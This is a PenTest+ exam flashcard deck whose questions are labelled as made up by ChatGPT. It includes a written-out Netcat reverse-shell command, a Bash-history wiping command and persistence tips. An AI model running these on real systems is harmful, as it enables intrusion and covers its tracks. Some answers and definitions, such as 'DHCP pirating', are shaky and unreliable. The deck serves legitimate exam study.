Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

PenTest+ > ChatGPT made up some questions > Flashcards

ChatGPT made up some questions Flashcards

1
Q

Annie wants to permanently remove evidence of commands she entered in a Bash shell on a compromised Linux system. Which command should she use?

  • history -c
  • kill -9 $$
  • echo “” > ~/.bash_history
  • ln /dev/null ~/.bash_history -sf
A

ln /dev/null ~/.bash_history -sf

While history -c clears the current session’s history, the Bash history file will still persist on disk. The correct answer is D, ln /dev/null ~/.bash_history -sf, which creates a symbolic link to /dev/null for the history file. This effectively prevents any future commands from being written to ~/.bash_history, permanently erasing the history

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Kaiden is performing an automated web application security scan before deployment. Which tool is best suited for this task?

  • nmap
  • Nikto
  • Wireshark
  • CeWL
A

Nikto

Nikto is a dedicated web application security scanner designed to identify vulnerabilities such as misconfigurations, outdated software, and potential security issues in web servers and applications. Nmap is primarily a network scanner, Wireshark is a packet analysis tool, and CeWL is a tool for creating custom wordlists

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Steve is gathering information during a penetration test without actively interacting with or probing the target systems. What type of information is he collecting?

  • OSINT
  • HSI
  • Background
  • None of the above
A

OSINT

Open Source Intelligence (OSINT) involves collecting publicly available information about a target without engaging in direct interaction. This includes using sources like websites, social media, and publicly accessible databases. It is a passive reconnaissance technique

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Brian is investigating his organization’s servers to look for evidence of past breaches. What term best describes this activity?

  • Penetration testing
  • Vulnerability scanning
  • Remediation
  • Threat hunting
A

Threat hunting

involves proactively searching an organization’s infrastructure for signs of past or ongoing breaches. Unlike penetration testing or vulnerability scanning, threat hunting adopts the attacker’s mindset to find evidence of compromises

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Liam runs the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh

What has Liam done?

  • Started a reverse shell using Netcat
  • Captured traffic on the Ethernet port to the console via Netcat
  • Set up a bind shell using Netcat
  • None of the above
A

Started a reverse shell using Netcat

The correct answer is A. Started a reverse shell using Netcat. In this command, Netcat (nc) connects to the remote IP address (10.1.10.1) on port 7337 and executes the Bash shell (/bin/sh). This creates a reverse shell where the compromised system initiates the connection to the attacker’s system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Alaina wants to conduct an on-path attack against a target system. Which technique can she use to make it appear she has the IP address of a trusted server?

  • ARP spoofing
  • IP proofing
  • DHCP pirating
  • Spoofmastering
A

ARP spoofing

ARP spoofing involves sending forged ARP responses to associate the attacker’s MAC address with the IP address of a trusted server. This allows the attacker to intercept traffic intended for the legitimate server, enabling an on-path attack

Spoofmastering and IP proofing are made up

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

DHCP pirating

A

involves an attacker compromising or impersonating a DHCP server to distribute rogue IP configurations to clients on a network. This can be used to redirect traffic, enable man-in-the-middle attacks, or disrupt network connectivity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Michael’s social engineering attack relies on telling staff members that others have already provided the information he is requesting. What motivation technique is he using?

  • Authority
  • Scarcity
  • Likeness
  • Social proof
A

Social proof

Explanation:
The correct answer is D. Social proof. Social proof relies on convincing the target that others have already taken a specific action or provided the requested information, leveraging the target’s trust in collective behavior. Likeness relies on building rapport and finding commonalities with the target

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Vincent wants access to workstations at his target organization but cannot gain entry to the building or remote access. What technique can he use to attempt physical compromise?

  • Shoulder surfing
  • Kerberoasting
  • USB key drop
  • Quid pro quo
A

USB key drop

A USB key drop involves leaving malicious USB drives in accessible locations to tempt employees into plugging them into their workstations. This technique relies on human curiosity and can install malware or provide the attacker with access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Jennifer discovers the following file attributes on a Linux system:
-rwsr-xr– 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

What type of file has she found?

  • An encrypted file
  • A hashed file
  • A SUID file
  • A SIP file
A

A SUID file

Explanation:
The “s” in the file permissions indicates that this is a SUID (Set User ID) file. When executed, it runs with the permissions of its owner (in this case, root) rather than the user who runs it. This can be a security risk if improperly managed

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

SUID file

A
  • A SUID file in Linux is indicated by an “s” in the owner execute position of the file permissions (e.g., -rwsr-xr–)
  • This means that when the file is executed, it runs with the permissions of the file owner (typically root) rather than the user executing the file
  • SUID is a legitimate feature but can be a security risk if improperly configured, as it can be exploited to elevate privileges.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

SIP file

A
  • SIP (System Integrity Protection) is a macOS-specific security feature and does not apply directly to Linux files.
  • SIP is designed to protect system files, directories, and processes from being modified, even by users with root privileges.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Chris suspects a Linux system he has compromised is a virtual machine. Which of the following techniques will NOT help confirm virtualization?

  • Run system-detect-virt.
  • Run ls -l /dev/disk/by-id.
  • Run wmic baseboard get manufacturer, product.
  • Run dmidecode to retrieve hardware information.
A

Run wmic baseboard get manufacturer, product.

The correct answer is C. Run wmic baseboard get manufacturer, product. This command is specific to Windows and cannot be used on a Linux system to check for virtualization. The other options are valid methods for identifying virtualization on Linux

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Which of the following tools is best suited for performing passive reconnaissance using open-source intelligence (OSINT)?

  • Nmap
  • Shodan
  • Metasploit
  • Nikto
A

Shodan

Shodan is a search engine specifically designed to identify devices connected to the internet and provide OSINT for passive reconnaissance. It allows penetration testers to gather information without directly interacting with the target. Tools like Nmap, Metasploit, and Nikto involve active interaction and scanning of the target systems​.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What type of privilege escalation involves exploiting software bugs to gain higher permissions on a system?

  • Vertical privilege escalation
  • Horizontal privilege escalation
  • Exploit chaining
  • Social engineering
A

Vertical privilege escalation

Vertical privilege escalation occurs when an attacker exploits software bugs or vulnerabilities to gain higher permissions, such as moving from a standard user account to an administrative account. Horizontal privilege escalation, in contrast, involves accessing another user’s data or privileges at the same level

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is the main purpose of setting up a SOCKS proxy during a penetration test?

  • To intercept and modify web traffic
  • To anonymize the penetration tester’s traffic
  • To route traffic through a compromised system for lateral movement
  • To exfiltrate data from a target network
A

To route traffic through a compromised system for lateral movement

A SOCKS proxy is commonly used during penetration testing to route traffic through a compromised system. This allows the penetration tester to perform lateral movement within the target network while maintaining control over traffic flow. Intercepting or modifying web traffic would typically involve tools like Burp Suite, not SOCKS proxies​.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Which type of vulnerability occurs when an application includes unvalidated user input in a web request without proper encoding or validation?

  • Cross-Site Scripting (XSS)
  • SQL Injection
  • File Inclusion
  • Command Injection
A

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) vulnerabilities occur when an application fails to properly validate or encode user input, allowing malicious scripts to be executed in the browser of another user. This can result in data theft, session hijacking, or unauthorized actions on behalf of the victim. SQL injection, file inclusion, and command injection target different components of a system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Which of the following tools would a penetration tester use to test for directory traversal vulnerabilities in a web application?

  • Burp Suite
  • Metasploit
  • Nikto
  • Hydra
A

Nikto

Nikto is a web server scanner designed to identify vulnerabilities, including directory traversal, outdated software, and insecure configurations. While Burp Suite can also test for web vulnerabilities, it requires manual configuration for such tests. Metasploit focuses on exploits, and Hydra is used for password attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

What technique can attackers use to spoof their IP address during an on-path attack?

  • MAC flooding
  • IP spoofing
  • VLAN hopping
  • DNS cache poisoning
A

IP spoofing

Explanation:
IP spoofing involves forging the source IP address in packets to make them appear as if they originate from a trusted source. This technique is commonly used during on-path attacks to intercept or redirect traffic. DNS cache poisoning manipulates DNS responses, but it doesn’t spoof IP addresses directly

20
Q

IP spoofing

A
  • technique used in cybersecurity to forge the source IP address of a packet, making it appear as though the packet originates from a trusted source
  • Attackers use IP spoofing to bypass security measures, hide their identity, or conduct specific types of attacks such as on-path attacks or denial-of-service (DoS
21
Q

What does the chmod 4755 command do when applied to a Linux executable file?

  • Makes the file writable by all users
  • Sets the SUID bit, allowing execution with the owner’s privileges
  • Hides the file from directory listings
  • Denies execution for non-root users
A

Sets the SUID bit, allowing execution with the owner’s privileges

The chmod 4755 command sets the SUID (Set User ID) bit on an executable file, enabling it to execute with the permissions of the file’s owner rather than the user running it. This is often used for system binaries but can be a security risk if misused​.

22
Q

Which of the following best describes the purpose of a honeypot in penetration testing?

  • To identify vulnerabilities in internal systems
  • To attract and monitor attackers’ activities
  • To prevent unauthorized access to critical systems
  • To provide redundancy for high-availability services
A

To attract and monitor attackers’ activities

A honeypot is a decoy system designed to lure attackers and monitor their behavior, providing valuable insights into their tactics, techniques, and procedures. It is not intended for system protection or redundancy but rather as a tool for detection and research​.

23
Q

Which scripting language is commonly used to automate penetration testing tasks and create custom scripts for exploits?

  • PowerShell
  • Ruby
  • Python
  • Perl
A

Python

Python is one of the most widely used scripting languages for automating penetration testing tasks and developing custom exploits due to its versatility, extensive libraries, and ease of use. While PowerShell is used in Windows environments, and Ruby and Perl are also scripting options, Python is the most common choice for penetration testing

24
Q

SOCKS proxy

A
  • a transport layer proxy that routes traffic through an intermediary, supporting protocols like TCP and UDP
  • commonly used in penetration testing for lateral movement, allowing traffic to pivot through a compromised host and access internal networks
  • anonymize traffic by masking the original source
25
Q

DNS poisoning

A
  • also known as DNS cache poisoning or DNS spoofing
  • an attack that corrupts the DNS resolution process
  • manipulates the DNS cache of a resolver or a user’s machine to redirect traffic from legitimate websites to malicious ones without the user’s knowledge
26
Q

chmod 4755

A

Turns the file into an SUID file (When the file is executed, it runs with the privileges of the file owner, regardless of the user’s privileges; Commonly used for system utilities that require elevated privileges (e.g., /usr/bin/passwd))

The First Digit: 4 (SetUID bit)
4 (SetUID): This sets the SUID (Set User ID) bit on the file.

  1. The Remaining Digits: 755 (Standard File Permissions)
    These represent the file’s owner, group, and others permissions:
    7 (Owner): Read (r), write (w), and execute (x) permissions.
    5 (Group): Read (r) and execute (x) permissions.
    5 (Others): Read (r) and execute (x) permissions.
27
Q

You are conducting a penetration test and need to identify which systems on a target network are vulnerable to remote code execution exploits. Which of the following tools is most suited for this task, and why?

  • Nikto
  • Nmap
  • Wireshark
  • Burp Suite
A

Nmap

Nmap is a versatile network scanner that can perform detailed reconnaissance of systems on a network. With the use of scripts (such as the Nmap Scripting Engine or NSE), it can check for specific vulnerabilities, including those that allow remote code execution. Nikto (option A) is primarily a web server scanner and is not used for general network vulnerability scanning

28
Q

During a penetration test, you gain access to a Linux system and want to maintain persistence. Which of the following methods is most likely to provide persistence without requiring high privileges?

  • Creating a cron job to execute your payload
  • Adding your payload to the system’s startup scripts
  • Modifying the SSH authorized_keys file
  • Installing a rootkit
A

Modifying the SSH authorized_keys file

Modifying the ~/.ssh/authorized_keys file allows you to add your public SSH key to the target user’s SSH configuration. This method provides persistence without requiring elevated (root) privileges, as it only requires write access to the target user’s home directory. While creating a cron job (Option A) or modifying startup scripts (Option B) are valid persistence techniques, they typically require higher privileges. Installing a rootkit (Option D) is also persistent but involves significant risks and high privilege requirements

29
Q

A penetration tester needs to enumerate subdomains for a target organization as part of the reconnaissance phase. Which tool is most appropriate for this task?

  • theHarvester
  • Nessus
  • Nikto
  • Wireshark
A

theHarvester

theHarvester is specifically designed for gathering open-source intelligence (OSINT) such as subdomains, email addresses, and other related information from public sources. It is highly effective during the reconnaissance phase of a penetration test. Nessus (Option B) and Nikto (Option C) are used for vulnerability scanning, and Wireshark (Option D) captures and analyzes network traffic, making them unsuitable for this task

30
Q

You want to test whether a target system is vulnerable to a Man-in-the-Middle (MitM) attack by spoofing ARP messages. Which tool would you choose?

  • Responder
  • Aircrack-ng
  • Ettercap
  • Hydra
A

Ettercap

Ettercap is a tool designed specifically for carrying out Man-in-the-Middle (MitM) attacks, including ARP spoofing, allowing penetration testers to intercept, manipulate, or observe network traffic. Responder (Option A) is used for capturing credentials in network poisoning attacks but does not perform ARP spoofing. Aircrack-ng (Option B) focuses on wireless network attacks, and Hydra (Option D) is used for brute-forcing credentials

31
Q

Ettercap

A
  • A comprehensive suite of tools for performing on-path (Man-in-the-Middle) attacks on a variety of systems and protocols.
  • Allows penetration testers to intercept, monitor, and manipulate live network traffic.
  • Open-source and supports plugins to extend its capabilities​.
32
Q

During a penetration test, you want to enumerate all user accounts on a Windows system using SMB. Which tool or technique would be best suited for this task?

  • BloodHound
  • PsExec
  • Enum4linux
  • CrackMapExec
A

Enum4linux

Enum4linux is a tool specifically designed for enumerating information from Windows systems using SMB, including user accounts, shared resources, and group memberships. BloodHound (Option A) is used for Active Directory enumeration and attack path analysis, PsExec (Option B) is for executing commands on remote systems, and CrackMapExec (Option D) is a broader post-exploitation tool that focuses on lateral movement and credential testing

33
Q

Enum4linux

A
  • A Linux-based tool for enumerating information from Windows systems via SMB, including user accounts, shares, and other sensitive details.
  • It is widely used during reconnaissance to gather critical data about a target environment.
  • Supports additional enumeration tasks like identifying group memberships and operating system details​.
34
Q

You need to test a target network for vulnerabilities associated with the SMB protocol. Which tool would allow you to scan for and exploit SMB vulnerabilities efficiently?

  • Metasploit
  • Nikto
  • Nessus
  • Burp Suite
A

Metasploit

Metasploit is a powerful framework for vulnerability assessment and exploitation, making it ideal for identifying and exploiting SMB vulnerabilities. It includes specific modules, such as those for EternalBlue and SMB enumeration. Nessus (Option C) is a vulnerability scanner and can identify SMB vulnerabilities but does not exploit them. Nikto (Option B) is for web server scanning, and Burp Suite (Option D) focuses on web application vulnerabilities

35
Q

You are writing a script to automate the process of extracting IP addresses from log files. Which scripting language would be the most efficient and commonly used for this task in penetration testing?

  • Python
  • Bash
  • Ruby
  • PowerShell
A

Python

is highly efficient and widely used in penetration testing due to its simplicity and extensive libraries for handling tasks like string manipulation, regex operations, and file processing. While Bash (Option B) is useful for shell scripting, Python is more powerful for processing structured data. Ruby (Option C) is less commonly used for this purpose, and PowerShell (Option D) is primarily tailored for Windows environment

36
Q

During a penetration test, you identify an open port running a MySQL service. Which tool would you use to test for vulnerabilities in the database?

  • Burp Suite
  • SQLmap
  • Nikto
  • Nessus
A

SQLmap

SQLmap is a tool designed for testing SQL injection vulnerabilities, making it ideal for testing MySQL and other databases for exploitable flaws. Burp Suite (Option A) is used for web application testing, Nikto (Option C) scans web servers for common vulnerabilities, and Nessus (Option D) is a general-purpose vulnerability scanner but not specifically focused on SQL injection

37
Q

Which tool would you use to craft custom packets for testing firewalls and IDS/IPS systems?

  • Nmap
  • Hping
  • Nessus
  • Hydra
A

Hping

Hping is a command-line tool used to craft and send custom packets, making it ideal for testing firewalls and intrusion detection/prevention systems (IDS/IPS). It provides flexibility in creating packets with specific headers, payloads, and flags. Nmap (Option A) is primarily a network scanning tool, Nessus (Option C) is for vulnerability assessment, and Hydra (Option D) is for brute-forcing credentials

38
Q

During a penetration test, you gain a limited shell on a Linux target. Which command will you use to attempt privilege escalation by checking for misconfigured SUID binaries?

  • ls -al /usr/bin/
  • sudo -l
  • find / -perm -4000 -type f 2>/dev/null
  • ps aux | grep root
A

find / -perm -4000 -type f 2>/dev/null

The command find / -perm -4000 -type f 2>/dev/null searches for files with the SUID bit set (-perm -4000) across the entire file system (/). SUID binaries can allow privilege escalation if they are misconfigured. While ls -al /usr/bin/ (Option A) lists files in a directory, it doesn’t find all SUID files. sudo -l (Option B) checks a user’s permissions with sudo but isn’t for finding SUID binaries. ps aux | grep root (Option D) lists processes run by the root user but doesn’t help with privilege escalation directly

39
Q

You need to test for insecure APIs in a web application. Which tool would be most effective?

  • OWASP ZAP
  • Nikto
  • Aircrack-ng
  • John the Ripper
A

OWASP ZAP

OWASP ZAP is a robust web application testing tool that includes features for API testing, such as intercepting and analyzing API requests and responses for vulnerabilities. Nikto (Option B) focuses on web server vulnerabilities, Aircrack-ng (Option C) is for wireless network testing, and John the Ripper (Option D) is for password cracking

40
Q

You suspect that an attacker has tampered with a critical log file on a compromised system. Which method would you use to verify the integrity of the log file?

  • Compare the log file against a known good backup.
  • Open the log file and inspect its contents manually.
  • Search for known attack patterns in the log file.
  • Run the ls command to check the file’s size and modification date.
A

Compare the log file against a known good backup

The most reliable way to verify the integrity of a log file is to compare it against a trusted, unaltered backup copy. This ensures that you detect even subtle modifications. Inspecting the file manually (Option B) may not reveal hidden changes, searching for attack patterns (Option C) might miss tampering unrelated to those patterns, and checking the file’s size and modification date with ls (Option D) provides limited information and can be easily manipulated by attackers

41
Q

During a penetration test, you discover that a target web application stores sensitive data in a session token without encryption. Which vulnerability best describes this issue?

  • Insecure Direct Object Reference (IDOR)
  • Session Fixation
  • Information Disclosure
  • Broken Authentication
A

Information Disclosure

Storing sensitive data in session tokens without encryption is an example of Information Disclosure. This vulnerability occurs when sensitive information is exposed in an unsafe manner, such as being stored in cleartext. Insecure Direct Object Reference (Option A) pertains to unauthorized access to objects, Session Fixation (Option B) relates to session management flaws, and Broken Authentication (Option D) involves failures in enforcing authentication mechanisms​​.

42
Q

Which tool would you use to analyze Windows memory dumps for signs of malware or other malicious activity?

  • Volatility
  • Wireshark
  • Metasploit
  • BloodHound
A

Volatility

Volatility is a powerful tool for memory forensics and is specifically designed to analyze memory dumps from Windows and other operating systems. It can identify malware, processes, and other malicious activities in memory. Wireshark (Option B) analyzes network traffic, Metasploit (Option C) is an exploitation framework, and BloodHound (Option D) is used for Active Directory attack path mapping

43
Q

Volatility

A
  • Purpose: A memory forensics framework used to analyze memory dumps from compromised systems.
  • Capabilities: Identifies malware, suspicious processes, and other malicious activity in system memory.
  • Use Case: Detecting malicious code and activities post-exploitation on Windows, Linux, and macOS.
44
Q

You want to identify whether a Linux system is running inside a virtualized environment. Which command would provide this information?

  • dmesg | grep virtual
  • lsmod | grep vm
  • ifconfig | grep eth0
  • ps aux | grep vmware
A

dmesg | grep virtual

The dmesg command displays messages from the system’s kernel, and using grep virtual filters for virtualization-related information. This method is a reliable way to determine whether a system is running in a virtualized environment. While lsmod | grep vm (Option B) may show virtualization modules, it’s not always comprehensive. Options C and D do not directly identify virtualization

45
Q

A penetration tester is using a tool to simulate multiple types of web application attacks, including XSS and CSRF. Which tool is being used?

  • BeEF
  • OWASP ZAP
  • Nikto
  • Burp Suite
A

BeEF

BeEF (Browser Exploitation Framework) specializes in exploiting browser vulnerabilities, including Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). While Burp Suite (Option D) is a comprehensive web application testing tool, BeEF is specifically focused on browser-based attack scenarios. OWASP ZAP (Option B) is for general web application vulnerability testing, and Nikto (Option C) focuses on web server vulnerabilities

46
Q

You need to evade detection while performing a network scan on a target system. Which of the following techniques is the most effective?

  • Fragmenting packets
  • Using the -T4 timing option in Nmap
  • Sending scans from a single IP address
  • Scanning all ports simultaneously
A

Fragmenting packets.

Fragmenting packets is an effective technique for evading detection because it splits the scan traffic into smaller packets, making it harder for intrusion detection systems (IDS) to recognize and block the activity. Using the -T4 timing option (Option B) increases scanning speed but is more likely to trigger detection. Sending scans from a single IP address (Option C) and scanning all ports simultaneously (Option D) are also more conspicuous and likely to be detected

PenTest+ (19 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2025 Bold Learning Solutions. Terms and Conditions